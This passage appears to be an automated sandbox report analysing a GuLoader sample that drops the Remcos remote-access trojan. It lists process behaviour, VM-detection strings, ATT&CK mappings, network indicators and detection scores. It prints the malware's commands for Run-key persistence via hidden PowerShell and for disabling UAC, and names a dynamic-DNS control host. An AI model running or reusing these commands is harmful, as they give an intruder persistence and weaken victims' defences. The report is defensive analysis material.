          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8487
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1182
          Source: C:\Users\user\Desktop\anziOUzZJs.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsu2C03.tmp\BgImage.dll
          Source: C:\Users\user\Desktop\anziOUzZJs.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsu2C03.tmp\nsExec.dll
          Source: C:\Users\user\Desktop\anziOUzZJs.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsu2C03.tmp\nsDialogs.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8000 Thread sleep time: -7378697629483816s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 3028 Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
          Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
          Source: C:\Users\user\Desktop\anziOUzZJs.exe Code function: 0_2_00405FFD FindFirstFileA,FindClose
          Source: C:\Users\user\Desktop\anziOUzZJs.exe Code function: 0_2_0040559B GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose
          Source: C:\Users\user\Desktop\anziOUzZJs.exe Code function: 0_2_00402688 FindFirstFileA
          Source: C:\Users\user\Desktop\anziOUzZJs.exe File opened: C:\Users\user
          Source: C:\Users\user\Desktop\anziOUzZJs.exe File opened: C:\Users\user\AppData\Roaming
          Source: C:\Users\user\Desktop\anziOUzZJs.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
          Source: C:\Users\user\Desktop\anziOUzZJs.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
          Source: C:\Users\user\Desktop\anziOUzZJs.exe File opened: C:\Users\user\AppData
          Source: C:\Users\user\Desktop\anziOUzZJs.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts
          Source: Amcache.hve.33.dr Binary or memory string: VMware
          Source: Amcache.hve.33.dr Binary or memory string: VMware Virtual USB Mouse
          Source: Amcache.hve.33.dr Binary or memory string: vmci.syshbin
          Source: Amcache.hve.33.dr Binary or memory string: VMware, Inc.
          Source: anziOUzZJs.exe, 00000000.00000002.1323264794.00000000004B1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\}}
          Source: powershell.exe, 0000000A.00000002.2007087274.00000000070FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWZS
          Source: Amcache.hve.33.dr Binary or memory string: VMware20,1hbin@
          Source: anziOUzZJs.exe, 00000000.00000002.1323264794.00000000004B1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:GG<
          Source: Amcache.hve.33.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
          Source: Amcache.hve.33.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
          Source: Amcache.hve.33.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
          Source: powershell.exe, 0000000A.00000002.2010084305.00000000081BB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2009656049.0000000008137000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2007087274.000000000711C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2507024953.0000014BA0454000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2505366099.0000014B9AE2B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
          Source: Amcache.hve.33.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
          Source: Amcache.hve.33.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
          Source: Amcache.hve.33.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
          Source: Amcache.hve.33.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
          Source: Amcache.hve.33.dr Binary or memory string: vmci.sys
          Source: Amcache.hve.33.dr Binary or memory string: vmci.syshbin`
          Source: Amcache.hve.33.dr Binary or memory string: \driver\vmci,\driver\pci
          Source: Amcache.hve.33.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
          Source: Amcache.hve.33.dr Binary or memory string: VMware20,1
          Source: Amcache.hve.33.dr Binary or memory string: Microsoft Hyper-V Generation Counter
          Source: Amcache.hve.33.dr Binary or memory string: NECVMWar VMware SATA CD00
          Source: Amcache.hve.33.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
          Source: Amcache.hve.33.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
          Source: Amcache.hve.33.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
          Source: Amcache.hve.33.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
          Source: Amcache.hve.33.dr Binary or memory string: VMware PCI VMCI Bus Device
          Source: Amcache.hve.33.dr Binary or memory string: VMware VMCI Bus Device
          Source: Amcache.hve.33.dr Binary or memory string: VMware Virtual RAM
          Source: Amcache.hve.33.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
          Source: Amcache.hve.33.dr Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
          Source: Amcache.hve.33.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
          Source: C:\Users\user\Desktop\anziOUzZJs.exe API call chain: ExitProcess graph end node graph_0-3610
          Source: C:\Users\user\Desktop\anziOUzZJs.exe API call chain: ExitProcess graph end node graph_0-3605
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_02AAD8A4 LdrInitializeThunk,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preferentialist" /t REG_EXPAND_SZ /d "%Therapeutic% -windowstyle minimized $Terrain=(Get-ItemProperty -Path 'HKCU:\Corycia\').mandskaber;%Therapeutic% ($Terrain)"
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preferentialist" /t REG_EXPAND_SZ /d "%Therapeutic% -windowstyle minimized $Terrain=(Get-ItemProperty -Path 'HKCU:\Corycia\').mandskaber;%Therapeutic% ($Terrain)"
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "preferentialist" /t reg_expand_sz /d "%therapeutic% -windowstyle minimized $terrain=(get-itemproperty -path 'hkcu:\corycia\').mandskaber;%therapeutic% ($terrain)"
          Source: powershell.exe, 0000000A.00000002.2007087274.000000000711C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
          Source: powershell.exe, 0000000A.00000002.2007087274.000000000711C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager-
          Source: powershell.exe, 0000000A.00000002.2009656049.00000000080D0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerTRI
          Source: powershell.exe, 0000000A.00000002.2007087274.000000000711C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager4D\[
          Source: powershell.exe, 0000000A.00000002.2009656049.00000000080D0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager6)\Comm
          Source: powershell.exe, 0000000A.00000002.2007087274.000000000711C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managertdesk@
          Source: powershell.exe, 0000000A.00000002.2007087274.000000000711C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2009656049.00000000080D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2009656049.000000000814A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [Program Manager]
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
          Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
          Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
          Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
          Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Users\user\Desktop\anziOUzZJs.exe Code function: 0_2_00405D1B GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA

          Lowering of HIPS / PFW / Operating System Security Settings

          Source: C:\Windows\SysWOW64\reg.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA
          Source: Amcache.hve.33.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
          Source: Amcache.hve.33.dr Binary or memory string: msmpeng.exe
          Source: Amcache.hve.33.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
          Source: Amcache.hve.33.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
          Source: Amcache.hve.33.dr Binary or memory string: MsMpEng.exe

          Stealing of Sensitive Information

          Source: Yara match File source: 0000000A.00000002.2009656049.0000000008137000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 0000000A.00000002.2007087274.00000000070D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 0000000A.00000002.2002199771.0000000002B58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: Process Memory Space: powershell.exe PID: 7800, type: MEMORYSTR

          Remote Access Functionality

          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-7CSH4D
          Source: Yara match File source: 0000000A.00000002.2009656049.0000000008137000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 0000000A.00000002.2007087274.00000000070D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 0000000A.00000002.2002199771.0000000002B58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: Process Memory Space: powershell.exe PID: 7800, type: MEMORYSTR
MITRE ATT&CK Matrix (one line per tactic; the numbers in parentheses are the counts shown in the report next to the techniques matched by signatures):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Windows Management Instrumentation (1); Command and Scripting Interpreter (11); PowerShell (2); Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: DLL Side-Loading (1); Registry Run Keys / Startup Folder (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: DLL Side-Loading (1); Access Token Manipulation (1); Process Injection (12); Registry Run Keys / Startup Folder (1); Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: Disable or Modify Tools (1); Obfuscated Files or Information (1); Software Packing (1); DLL Side-Loading (1); Masquerading (111); Modify Registry (1); Virtualization/Sandbox Evasion (31); Access Token Manipulation (1); Process Injection (12)
Credential Access: Input Capture (11); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: File and Directory Discovery (3); System Information Discovery (24); Security Software Discovery (121); Process Discovery (2); Virtualization/Sandbox Evasion (31); Application Window Discovery (1); Remote System Discovery; System Owner/User Discovery; Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: Archive Collected Data (1); Input Capture (11); Clipboard Data (1); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: Ingress Tool Transfer (1); Encrypted Channel (11); Remote Access Software (1); Non-Application Layer Protocol (2); Application Layer Protocol (213); Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
Behavior Graph ID: 1502984  Sample: anziOUzZJs.exe  Startdate: 02/09/2024  Architecture: WINDOWS  Score: 100

DNS/IP: a458386d9.duckdns.org; drive.usercontent.google.com; drive.google.com
Signatures: Found malware configuration; Multi AV Scanner detection for dropped file; Multi AV Scanner detection for submitted file; 5 other signatures
Uses dynamic DNS services -> a458386d9.duckdns.org

Process tree (numbers after a process name are the counters shown next to it in the graph):
anziOUzZJs.exe (32) started
    dropped: C:\Users\user\AppData\Local\...\BgImage.dll (PE32); C:\Users\user\AppData\Local\...\nsExec.dll (PE32); C:\Users\user\AppData\Local\...\nsDialogs.dll (PE32)
    signatures: Suspicious powershell command line found
    powershell.exe (5 29) started
        network: drive.usercontent.google.com 142.250.181.225, 443, 49729 GOOGLEUS United States; drive.google.com 142.250.184.238, 443, 49726 GOOGLEUS United States
        dropped: C:\Users\user\AppData\...\Partivarerne.scr (PE32); C:\ProgramData\remcos\logs.dat (data)
        signatures: Detected Remcos RAT; Drops PE files with a suspicious file extension; Found suspicious powershell code related to unpacking or dynamic code loading; 2 other signatures
        cmd.exe (1) started
            signatures: Uses cmd line tools excessively to alter registry or file data
            reg.exe (1) started
                signatures: Disables UAC (registry)
            conhost.exe started
        cmd.exe (1) started
            conhost.exe started
            reg.exe (1 1) started
        WerFault.exe (23 16) started
        2 other processes started
svchost.exe (1 1) started
    network: 127.0.0.1 unknown unknown

Source | Detection | Scanner | Label
anziOUzZJs.exe | 53% | ReversingLabs | Win32.Trojan.GuLoader

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\Partivarerne.scr | 53% | ReversingLabs | Win32.Trojan.GuLoader
C:\Users\user\AppData\Local\Temp\nsu2C03.tmp\BgImage.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\nsu2C03.tmp\nsDialogs.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\nsu2C03.tmp\nsExec.dll | 0% | ReversingLabs |
          No Antivirus matches
          No Antivirus matches
Source | Detection | Scanner | Label
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
https://g.live.com/odclientsettings/Prod1C: | 0% | URL Reputation | safe
http://nsis.sf.net/NSIS_Error | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
https://aka.ms/pscore6lB | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://g.live.com/odclientsettings/ProdV21C: | 0% | URL Reputation | safe
http://upx.sf.net | 0% | URL Reputation | safe
http://nsis.sf.net/NSIS_ErrorError | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://drive.usercontent.google.com/1$T | 0% | Avira URL Cloud | safe
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Avira URL Cloud | safe
https://drive.google.com/ | 0% | Avira URL Cloud | safe
http://crl.ver) | 0% | Avira URL Cloud | safe
https://drive.google.com// | 0% | Avira URL Cloud | safe
PP9.duckdns.org | 0% | Avira URL Cloud | safe
https://drive.usercontent.google.com/ | 0% | Avira URL Cloud | safe
https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
drive.google.com | 142.250.184.238 | true | false | | unknown
drive.usercontent.google.com | 142.250.181.225 | true | false | | unknown
a458386d9.duckdns.org | unknown | unknown | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
PP9.duckdns.org | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 0000000A.00000002.2005526525.0000000005A3F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://g.live.com/odclientsettings/Prod1C: | edb.log.26.dr | false | URL Reputation: safe | unknown
http://nsis.sf.net/NSIS_Error | anziOUzZJs.exe, Partivarerne.scr.10.dr | false | URL Reputation: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000000A.00000002.2003170907.0000000004B27000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/pscore6lB | powershell.exe, 0000000A.00000002.2003170907.00000000049D1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000000A.00000002.2003170907.0000000004B27000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://drive.google.com/ | powershell.exe, 0000000A.00000002.2007087274.000000000715C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://drive.usercontent.google.com/1$T | powershell.exe, 0000000A.00000002.2002199771.0000000002BAD000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 0000000A.00000002.2005526525.0000000005A3F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 0000000A.00000002.2005526525.0000000005A3F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 0000000A.00000002.2005526525.0000000005A3F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 0000000A.00000002.2005526525.0000000005A3F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://drive.google.com// | powershell.exe, 0000000A.00000002.2007087274.000000000715C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://g.live.com/odclientsettings/ProdV21C: | svchost.exe, 0000001A.00000003.1875644629.0000014BA02D0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.26.dr, edb.log.26.dr | false | URL Reputation: safe | unknown
http://crl.ver) | svchost.exe, 0000001A.00000002.2506873908.0000014BA0400000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://drive.usercontent.google.com/ | powershell.exe, 0000000A.00000002.2007087274.00000000070D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2002199771.0000000002BAD000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://upx.sf.net | Amcache.hve.33.dr | false | URL Reputation: safe | unknown
http://nsis.sf.net/NSIS_ErrorError | anziOUzZJs.exe, Partivarerne.scr.10.dr | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 0000000A.00000002.2003170907.00000000049D1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 0000000A.00000002.2003170907.0000000004B27000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
142.250.181.225 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
142.250.184.238 | drive.google.com | United States | 15169 | GOOGLEUS | false

Private IPs:
127.0.0.1
                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1502984
                Start date and time:2024-09-02 16:18:50 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 6m 4s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:37
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:anziOUzZJs.exe
                renamed because original name is a hash value
                Original Sample Name:39f1703e13bdc112f4ffe9240f70cd5eb5b07cc218e6b22a8d58e4dcfaadd0a1.exe
                Detection:MAL
                Classification:mal100.troj.spyw.evad.winEXE@17/34@6/3
                EGA Information:
                • Successful, ratio: 50%
                HCA Information:
                • Successful, ratio: 99%
                • Number of executed functions: 134
                • Number of non-executed functions: 39
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, RuntimeBroker.exe, SIHClient.exe, MoUsoCoreWorker.exe, UsoClient.exe, audiodg.exe, WerFault.exe, ShellExperienceHost.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                • Excluded IPs from analysis (whitelisted): 184.28.90.27, 104.208.16.94
